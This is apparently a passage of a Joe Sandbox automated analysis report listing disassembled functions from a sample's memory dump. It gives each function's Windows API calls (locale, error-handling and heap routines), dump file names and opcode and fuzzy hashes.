Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A5314

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 6eb5a205fed55e7f8540d08a2a7ef5db21dd7c06cdf6e8e01ebf76ab310ab660
Instruction ID: 914c38a1f7ea2b9146a8671df2ae36de113b83fc129935608bb2322b218eb3c7
Opcode Fuzzy Hash: 6eb5a205fed55e7f8540d08a2a7ef5db21dd7c06cdf6e8e01ebf76ab310ab660
Instruction Fuzzy Hash: A911E57660460AABDF14AF28DC42ABE77ECFF5A360B10817AF901D7142EB78ED418750

Function 001A4E38 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

EnumSystemLocalesW.KERNEL32(001A4EE0,00000001,00000000,?,-00000050,?,001A4CC3,00000000,-00000002,00000000,?,00000055,?), ref: 001A4EAA

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2833f54cd56b4087a8c39b5fb635c6f20b716366f3b3d977f60886e83eabcf02
Instruction ID: e2e84310ec1f58eec1414fb73672959997b99502e8b9dda2ca51d45af1559199
Opcode Fuzzy Hash: 2833f54cd56b4087a8c39b5fb635c6f20b716366f3b3d977f60886e83eabcf02
Instruction Fuzzy Hash: 8111E53A2007055FDB289F39D8A16BAB792FF81368B14453DE94687B40E3B5B942CB80

Function 0018A720 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

o, xrefs: 0018ABB1

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: 65f5e7152a47697ac37315fb4f2ebdc387723d960379fc1b2e65d18e3698709d
Instruction ID: 6fdb8913f7c63be51ce61163c44e7d4207c47577553e3f98007e5acbb2e5433a
Opcode Fuzzy Hash: 65f5e7152a47697ac37315fb4f2ebdc387723d960379fc1b2e65d18e3698709d
Instruction Fuzzy Hash: E2B12636A093404BAB18D919C49426F7BE39FDA325FDA865FE08587291C738DE438B53

Function 001A546D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001A50FC,00000000,00000000,?), ref: 001A5499

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 526416a2458f0a8fc4b9c34fcff439680ebb7007679694771da924bfd3b33763
Instruction ID: 70dd75ab6b1f8832e81e96980b3c6d4f3ffc515d603d155115e0141da5a6cdf6
Opcode Fuzzy Hash: 526416a2458f0a8fc4b9c34fcff439680ebb7007679694771da924bfd3b33763
Instruction Fuzzy Hash: 9C01493B604516BBDB2C5B20CC05BBA3756EB41315F254438EC02E3180FB30FE82CA90

Function 001A5133 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

EnumSystemLocalesW.KERNEL32(001A51A0,00000001,?,?,-00000050,?,001A4C8B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 001A517D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ec114f3b6ff08ec546d99ed615c8187ec90e9e926d2dae96b27da5c413956c25
Instruction ID: 2ac8fdccb9e73ad6c6a64c646fbe8c6c16dc4211f06d98d5b9993271bf0326b6
Opcode Fuzzy Hash: ec114f3b6ff08ec546d99ed615c8187ec90e9e926d2dae96b27da5c413956c25
Instruction Fuzzy Hash: 14F0F63A3047046FDB255F39EC81B7A7BD2EF81368F05842DF9058B680D7B19C42C650

Function 001A0BCD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019A8D1: EnterCriticalSection.KERNEL32(?,?,001A00A8,0019A5E8,001BD8D8,00000008,0019FF9A,?,00000000,0019A5E8), ref: 0019A8E0

EnumSystemLocalesW.KERNEL32(001A0BC0,00000001,001BD958,0000000C,001A05C1,-00000050), ref: 001A0C05

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 64769623d1cc627144cfd1ad740a41497e3d02fabdb053b10cccacc0c7178806
Instruction ID: f9c42dd9d08f43b5abceef91a4360f25386ca02420be72c025665167d930e272
Opcode Fuzzy Hash: 64769623d1cc627144cfd1ad740a41497e3d02fabdb053b10cccacc0c7178806
Instruction Fuzzy Hash: A8F06DB6A40304DFDB01EF98E942B9C7BF0EB58725F10816AF410DB2A0C7B59940DF90

Function 001A5275 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

EnumSystemLocalesW.KERNEL32(001A52C0,00000001,?,?,?,001A4CE5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 001A52AC

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fdd551d2e0c3a4b7d003fb73a963c1d6fd5f9e78d9371b8cd5b61341346c4b88
Instruction ID: 8030f136f980a26bc519a5764d638da14f06e7b4e839ca3a89a2dfb4a901fcf7
Opcode Fuzzy Hash: fdd551d2e0c3a4b7d003fb73a963c1d6fd5f9e78d9371b8cd5b61341346c4b88
Instruction Fuzzy Hash: CCF0E53A30020597CB049F75D855B6A7F95EFC2720B06806EEA05CB651C7719883C790

Function 001A06C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,001995F3,?,20001004,00000000,00000002,?,?,00198505), ref: 001A06F9

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 086bed312feb22a717410991d846f66c49c87bd1d167a899117c44f1f2324f9e
Instruction ID: 4cb3c4d67d7d93b8b4dbd4342e6cbeee7b9ca9b25f4ad3e0202cf5f69945b521
Opcode Fuzzy Hash: 086bed312feb22a717410991d846f66c49c87bd1d167a899117c44f1f2324f9e
Instruction Fuzzy Hash: C6E04F35500218BBCF132F60DC04EAE3F16FF59750F054015FD0966121CB768D70AAD4

Function 00190F4F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00021080), ref: 00190F54

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b9204320fc497b0aee139f5f856b9bbbc26d76f2547bd5e8cac3e7f08b12937c
Instruction ID: c45bebcfda74a2aeae670cb5b0b4a22b32b4634cccc11c7eb0b1be688b8e296b
Opcode Fuzzy Hash: b9204320fc497b0aee139f5f856b9bbbc26d76f2547bd5e8cac3e7f08b12937c
Instruction Fuzzy Hash:

Function 001A12F0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 001A12F0

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 480385fc0038a7217211472106536e26f488bfe82c6da8d86115711daacdadc7
Instruction ID: 145523e580d70bcff9aefb65cfffb6a9999a75b26453b3045faab83c9a47c88b
Opcode Fuzzy Hash: 480385fc0038a7217211472106536e26f488bfe82c6da8d86115711daacdadc7
Instruction Fuzzy Hash: EFA022B0282300CF83008F38BF08B0E3FE8EB082C03080028E000C0830EB30C8C0AB02

Function 00177140 Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00faafbcbacbbefb2dc083839c36cad338fdf17d3964da15b2c5ebd8d2e2abec
Instruction ID: 593aa95406061f0e096cd6df292cc0de2d32343170f35cfef512e022d683ddfd
Opcode Fuzzy Hash: 00faafbcbacbbefb2dc083839c36cad338fdf17d3964da15b2c5ebd8d2e2abec
Instruction Fuzzy Hash: 4E3206367083408FDB18CE38C4956AE7BE2AFC5315F25892EE95AC73A1D736DC458B42

Function 00177E80 Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2425e860254fd5234f8063368854bd6c915bde1897a15ddd8ad03352be73df0
Instruction ID: 782ffa9086e9464600eeb1ccaaaea21d70f30e709471066fe7e0831d9eb7cb9d
Opcode Fuzzy Hash: c2425e860254fd5234f8063368854bd6c915bde1897a15ddd8ad03352be73df0
Instruction Fuzzy Hash: 272219357083415FDB188A2894E57AF77E2ABC5345F24892EF88AC7791DB36CC498B42

Function 0019E689 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a9cc4529aff45f1a388f6e81a30420e3cccb832f631247d041e05ff87339a0
Instruction ID: 7237c07823727195dcf6504f6def7e77943c3973726acd2baaa4d92e8388567c
Opcode Fuzzy Hash: f5a9cc4529aff45f1a388f6e81a30420e3cccb832f631247d041e05ff87339a0
Instruction Fuzzy Hash: 3F32F321D29F414DDB239A34C932335A689AFB73D5F15D727F82AB5EA6EF2984C34100

Function 00178A00 Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2232bf94b29e6da4a8c6b14580d6930b0b50667493fd3fd0577fce1a6748345b
Instruction ID: ca0f398131088d0706d33c73ea19806aec85ccdb7bf9880563412d7bfb4ceb98
Opcode Fuzzy Hash: 2232bf94b29e6da4a8c6b14580d6930b0b50667493fd3fd0577fce1a6748345b
Instruction Fuzzy Hash: 0222E5757583018FCB18CA28C8D96AA77E69BD5350F29C92EF849C7360DB31DC49CB52

Function 00179C40 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233ed7e28c1dd4841be4dcaf078379cddba02f18ab5e2b4046b1c2a9fab3dbb6
Instruction ID: 4a95c72d4deef707391f0848abda7a49ffc07b27d368ee0c4f2a5838922bbc7f
Opcode Fuzzy Hash: 233ed7e28c1dd4841be4dcaf078379cddba02f18ab5e2b4046b1c2a9fab3dbb6
Instruction Fuzzy Hash: 2B1247377196004FDB18CE39CC8566E77E2ABC9350F69D929E849CB354DB39CC498782

Function 001852F0 Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ffdd462824171361f7ba7f55234364179d1eb514da0485598d78ed5bd8a4f9d
Instruction ID: 138a30217dc5ccebd93bffbd5d6cd340079074b64ae3e361123caed5f3b7837a
Opcode Fuzzy Hash: 9ffdd462824171361f7ba7f55234364179d1eb514da0485598d78ed5bd8a4f9d
Instruction Fuzzy Hash: B9026936B00A058BDB1C96389CE63EE37D3EB95390F698529D812CB294DB798D468F41

Function 00183810 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094ba0e9db7b9ab0bb8e4ad06c5e9c527a52ca0379f97a779013dcfc0e232120
Instruction ID: ff891372419a5dfe6b5647aeea1d9382ac1b9706dde835c230f37829880cc883
Opcode Fuzzy Hash: 094ba0e9db7b9ab0bb8e4ad06c5e9c527a52ca0379f97a779013dcfc0e232120
Instruction Fuzzy Hash: 47E1DE3A7053004FDB18A93888D53EF37C25B95751F3D8925E865DB2A2DB2ACF894F41

Function 0018CFF0 Relevance: .4, Instructions: 433COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23634f8ce97a9cbb98353d2d90e823878be960adda38ba04cab1d0991300bad
Instruction ID: 2b7d52c2aa61abe65f2057545f707aef013d730f0286ddcc8f303c4c2e184528
Opcode Fuzzy Hash: c23634f8ce97a9cbb98353d2d90e823878be960adda38ba04cab1d0991300bad
Instruction Fuzzy Hash: 57F1A9757053018FCB14DE28D48079F7BE3AFC6350F294959E8954B2A2C776CD4A8F92

Function 00189E50 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a14b7e146a289b2052ddb408fbeb257021aab9d0f636861074748864e4ae5bc
Instruction ID: 7aff7cb112e2274d7432932ac608a045b8770b705949a9c6a69d95b16a0b0bb8
Opcode Fuzzy Hash: 5a14b7e146a289b2052ddb408fbeb257021aab9d0f636861074748864e4ae5bc
Instruction Fuzzy Hash: 4ED12436A043018FDB08DA28D8D166EBBE6EF94314F59892AF889C7354D735EE45CF42

Function 0017E5D0 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

